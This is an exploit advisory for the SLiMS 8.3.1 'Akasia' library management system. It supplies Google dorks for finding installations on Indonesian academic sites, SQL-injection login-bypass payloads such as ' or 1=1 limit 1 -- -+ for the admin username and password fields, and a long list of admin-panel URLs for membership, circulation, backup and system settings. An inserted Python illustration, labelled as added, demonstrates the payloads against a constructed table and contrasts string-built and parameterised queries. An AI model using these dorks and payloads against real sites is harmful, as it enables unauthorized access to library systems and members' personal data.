KingSkrupellos

Slims CMS Akasia 8.3.1 Improper Authorization Vulnerability

May 22nd, 2019
####################################################################

# Exploit Title : Slims CMS Akasia 8.3.1 Improper Authorization Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 20/05/2019
# Vendor Homepage : slimsetd.id - slims.web.id
# Software Download Link : slims.web.id/goslims/?wpdmpro=slims-8-3-1-akasia
# Software Information Link : foss4lib.org/package/senayan-library-management-system-slims/release/8.3.1
# Software Version : 8.3.1
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks :
intext:Template By Erwan Setyo Budi. Powered By SLiMS and ShapeBootstrap. site:ac.id
intext:Powered By SETIADI and ShapeBootstrap. site:ac.id
# Vulnerability Type :
CWE-285 [ Improper Authorization ]
CWE-284 [ Improper Access Control ]
CWE-592 [ Authentication Bypass Issues ]
CWE-287 [ Improper Authentication ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Description about Software :
***************************
Setiadi is an automation system for managing a repository of theses and
dissertations. Setiadi is built on SLiMS (Senayan Library Management System).
Setiadi is open source, licensed under GPL v3, and built with PHP and a
MySQL database.

SENAYAN Library Management System (SLiMS) version 8 Codename Akasia
SLiMS is free open source software for managing library resources
(such as books, journals, digital documents and other library materials) and
for library administration such as collection circulation, collection management,
membership, stock taking and more.

####################################################################

# Impact :
***********
The software does not restrict or incorrectly restricts access to a resource
from an unauthorized actor.

The software does not perform or incorrectly performs an authorization check when
an actor attempts to access a resource or perform an action.

When an actor claims to have a given identity, the software does not prove or
insufficiently proves that the claim is correct.

Assuming a user with a given identity, authorization is the process of determining whether
that user can access a given resource, based on the user's privileges and any permissions
or other access-control specifications that apply to the resource.

When access control checks are not applied consistently - or not at all - users are able
to access data or perform actions that they should not be allowed to perform.
This can lead to a wide range of problems, including information exposures,
denial of service, and arbitrary code execution.

####################################################################

# Authentication Bypass / Improper Access Control / Improper Authorization Exploit :
**************************************************************************
Admin Panel Login Path :
************************
/index.php?p=login
/admin

Admin Username :
admin
admin' --
'=''or'
' or 1=1 limit 1 -- -+
anything' OR 'x'='x

Admin Password :
admin
admin' --
'=''or'
' or 1=1 limit 1 -- -+
anything' OR 'x'='x

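To show what the payload lists above actually exercise, here is an added illustration (not SLiMS code and not from the advisory's author): a login check that pastes both form fields into the SQL text, beside a parameterised check with a constant-time hash comparison, both run against a constructed SQLite user table. The table layout, the credentials and the fixed `demo-salt` are assumptions made for the demo.

```python
import hashlib
import hmac
import sqlite3

# Constructed in-memory stand-in for the application's user table (SLiMS
# itself runs on MySQL; the injection mechanism is the same). The plaintext
# `password` column exists only so the weak check below has something to
# compare against; the hardened check reads `pw_hash` instead.
DB = sqlite3.connect(":memory:")
DB.execute("CREATE TABLE user (username TEXT PRIMARY KEY, password TEXT, pw_hash TEXT)")


def _pw_hash(password: str) -> str:
    # Fixed demo salt for brevity; use a random per-user salt in practice.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), b"demo-salt", 10_000).hex()


DB.execute("INSERT INTO user VALUES (?, ?, ?)",
           ("admin", "constructed-pass", _pw_hash("constructed-pass")))


def login_concat(username: str, password: str) -> bool:
    """Weak pattern: both request fields are pasted into the SQL text."""
    sql = (f"SELECT 1 FROM user WHERE username='{username}' "
           f"AND password='{password}'")
    try:
        return DB.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # a payload that breaks the syntax simply fails


def login_param(username: str, password: str) -> bool:
    """Hardened: bind the username, compare the password hash in constant time."""
    row = DB.execute("SELECT pw_hash FROM user WHERE username=?",
                     (username,)).fetchone()
    return row is not None and hmac.compare_digest(row[0], _pw_hash(password))


# Three of the advisory's payloads, sent in both fields as the advisory lists
# them. Its fourth variant, '=''or', relies on MySQL treating 0 and '' as
# equal and does not fire under SQLite, so it is left out here.
PAYLOADS = ["admin' --", "' or 1=1 limit 1 -- -+", "anything' OR 'x'='x"]


def accepted_payloads(login) -> list:
    """Return the payloads the given login function lets through."""
    return [p for p in PAYLOADS if login(p, p)]


if __name__ == "__main__":
    print("concat accepts:", accepted_payloads(login_concat))
    print("param accepts: ", accepted_payloads(login_param))
```

The string-built check lets every listed payload through with no valid credential, while the bound query only ever matches a literal username and still requires the correct password.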
Useable Admin Control Panel Links Exploits :
******************************************
/admin/modules/system/app_user.php?changecurrent=true&action=detail
/admin/index.php?mod=bibliography
/admin/modules/bibliography/index.php?action=detail
/admin/modules/bibliography/item.php
/admin/modules/bibliography/checkout_item.php
/admin/modules/bibliography/z3950sru.php
/admin/modules/bibliography/z3950.php
/admin/modules/bibliography/p2p.php
/admin/modules/bibliography/dl_print.php
/admin/modules/bibliography/item_barcode_generator.php
/admin/modules/bibliography/marcexport.php
/admin/modules/bibliography/marcimport.php
/admin/modules/bibliography/printed_card.php
/admin/modules/bibliography/export.php
/admin/modules/bibliography/import.php
/admin/modules/bibliography/item_export.php
/admin/modules/bibliography/item_import.php
/admin/index.php?mod=circulation
/admin/modules/circulation/index.php?action=start
/admin/modules/circulation/quick_return.php
/admin/modules/circulation/loan_rules.php
/admin/modules/reporting/customs/loan_history.php
/admin/modules/reporting/customs/overdued_list.php
/admin/modules/reporting/customs/reserve_list.php
/admin/index.php?mod=membership
/admin/modules/membership/index.php
/admin/modules/membership/index.php?action=detail
/admin/modules/membership/member_type.php
/admin/modules/membership/member_card_generator.php
/admin/modules/membership/export.php
/admin/modules/membership/import.php
/admin/index.php?mod=master_file
/admin/modules/master_file/index.php
/admin/modules/master_file/rda_cmc.php?type=content
/admin/modules/master_file/rda_cmc.php?type=media
/admin/modules/master_file/rda_cmc.php?type=carrier
/admin/modules/master_file/publisher.php
/admin/modules/master_file/supplier.php
/admin/modules/master_file/author.php
/admin/modules/master_file/topic.php
/admin/modules/master_file/location.php
/admin/modules/master_file/news_type.php
/admin/modules/master_file/place.php
/admin/modules/master_file/item_status.php
/admin/modules/master_file/coll_type.php
/admin/modules/master_file/doc_language.php
/admin/modules/master_file/label.php
/admin/modules/master_file/frequency.php
/admin/modules/master_file/p2pservers.php
/admin/modules/master_file/item_code_pattern.php
/admin/modules/master_file/author.php?type=orphaned
/admin/modules/master_file/topic.php?type=orphaned
/admin/modules/master_file/publisher.php?type=orphaned
/admin/modules/master_file/place.php?type=orphaned
/admin/index.php?mod=stock_take
/admin/modules/stock_take/index.php
/admin/modules/stock_take/init.php
/admin/modules/system/index.php
/admin/index.php?mod=system
/admin/modules/system/envinfo.php
/admin/modules/system/ucsetting.php
/admin/modules/system/theme.php
/admin/modules/system/content.php
/admin/modules/system/biblio_indexes.php
/admin/modules/system/module.php
/admin/modules/system/app_user.php
/admin/modules/system/user_group.php
/admin/modules/system/shortcut.php
/admin/modules/system/holiday.php
/admin/modules/system/barcode_generator.php
/admin/modules/system/sys_log.php
/admin/modules/system/backup.php
/admin/index.php?mod=reporting
/admin/modules/reporting/index.php
/admin/modules/reporting/loan_report.php
/admin/modules/reporting/member_report.php
/admin/modules/reporting/customs/class_recap.php
/admin/modules/reporting/customs/titles_list.php
/admin/modules/reporting/customs/item_titles_list.php
/admin/modules/reporting/customs/item_usage.php
/admin/modules/reporting/customs/loan_by_class.php
/admin/modules/reporting/customs/member_list.php
/admin/modules/reporting/customs/member_loan_list.php
/admin/modules/reporting/customs/loan_history.php
/admin/modules/reporting/customs/due_date_warning.php
/admin/modules/reporting/customs/overdued_list.php
/admin/modules/reporting/customs/staff_act.php
/admin/modules/reporting/customs/visitor_report.php
/admin/modules/reporting/customs/visitor_report_day.php
/admin/index.php?mod=chat
/admin/index.php?mod=serial_control
/admin/modules/serial_control/index.php

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################